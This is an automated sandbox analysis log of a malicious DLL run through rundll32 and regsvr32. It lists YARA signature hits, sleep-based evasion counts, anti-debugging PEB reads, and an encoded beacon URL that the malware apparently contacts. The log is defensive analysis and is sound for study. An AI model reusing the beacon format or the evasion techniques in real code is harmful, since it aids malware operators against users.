                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 33 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 44 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 31 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 43 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4364Thread sleep count: 49 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7680Thread sleep time: -1667865539s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7680Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.0 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.0 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.0 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.0 %
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F912D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02F912D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023E12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_023E12D4
                      Source: rundll32.exe, 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpBinary or memory string: vortex.data.microsoft.com/images/NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGR.avidpj8Cz|
                      Source: rundll32.exe, 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpBinary or memory string: .avi2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGRer=12&id=7256&crhhp
                      Source: {BC00BC65-1262-11EC-90E6-ECF4BB82F7E0}.dat.4.drBinary or memory string: http://web.vortex.data.microsoft.com/images/NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGR.avi
                      Source: rundll32.exe, 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpBinary or memory string: NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGRHHz
                      Source: WerFault.exe, 00000023.00000002.429475012.0000000005347000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000002.456974785.0000000004EC1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000023.00000002.429022901.000000000531C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(
                      Source: rundll32.exe, 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpBinary or memory string: NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGR
                      Source: {BC00BC65-1262-11EC-90E6-ECF4BB82F7E0}.dat.4.drBinary or memory string: .microsoft.com/images/NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktRoot Entry
                      Source: WerFault.exe, 00000023.00000003.419054530.0000000005387000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWK
                      Source: {BC00BC65-1262-11EC-90E6-ECF4BB82F7E0}.dat.4.drBinary or memory string: http://web.vortex.data.microsoft.com/images/NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGR.aviRoot Entry
                      Source: rundll32.exe, 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpBinary or memory string: ex.data.microsoft.com/images/NqcQT2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGR.avi
                      Source: rundll32.exe, 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpBinary or memory string: 2bUNfb5m1bY/JOi0y0F_2FTjhau/s06TEa7zT3uWBV5ZFK/IVmCIaBb7/pHXnbuHsY1ktrzz3wzNw/Jb7NfwdMI1o9YIX7z4a/3_2F_2BCQdpj8CzYVwfmwJ/Waj5rQa6FOgN4/rgZW23AI/_2F6NVJQTk3co0bzzkm2CcG/ukMCPqssCd/noM_2BzVPdJgHJ1BI/yuulwOQyfv1i/bedOT0I1e/X0F0GU2Z/hCKGR
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360469 mov eax, dword ptr fs:[00000030h]0_2_01360469
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01360397 mov eax, dword ptr fs:[00000030h]0_2_01360397
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0136009C mov eax, dword ptr fs:[00000030h]0_2_0136009C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013603F0 mov eax, dword ptr fs:[00000030h]0_2_013603F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F009C mov eax, dword ptr fs:[00000030h]3_2_029F009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F0469 mov eax, dword ptr fs:[00000030h]3_2_029F0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F0397 mov eax, dword ptr fs:[00000030h]3_2_029F0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_029F03F0 mov eax, dword ptr fs:[00000030h]3_2_029F03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E009C mov eax, dword ptr fs:[00000030h]5_2_035E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E0397 mov eax, dword ptr fs:[00000030h]5_2_035E0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E03F0 mov eax, dword ptr fs:[00000030h]5_2_035E03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_035E0469 mov eax, dword ptr fs:[00000030h]5_2_035E0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF009C mov eax, dword ptr fs:[00000030h]9_2_02FF009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF0397 mov eax, dword ptr fs:[00000030h]9_2_02FF0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF03F0 mov eax, dword ptr fs:[00000030h]9_2_02FF03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_02FF0469 mov eax, dword ptr fs:[00000030h]9_2_02FF0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE0469 mov eax, dword ptr fs:[00000030h]12_2_02AE0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE009C mov eax, dword ptr fs:[00000030h]12_2_02AE009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE0397 mov eax, dword ptr fs:[00000030h]12_2_02AE0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02AE03F0 mov eax, dword ptr fs:[00000030h]12_2_02AE03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_03290469 mov eax, dword ptr fs:[00000030h]19_2_03290469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_0329009C mov eax, dword ptr fs:[00000030h]19_2_0329009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_032903F0 mov eax, dword ptr fs:[00000030h]19_2_032903F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_03290397 mov eax, dword ptr fs:[00000030h]19_2_03290397
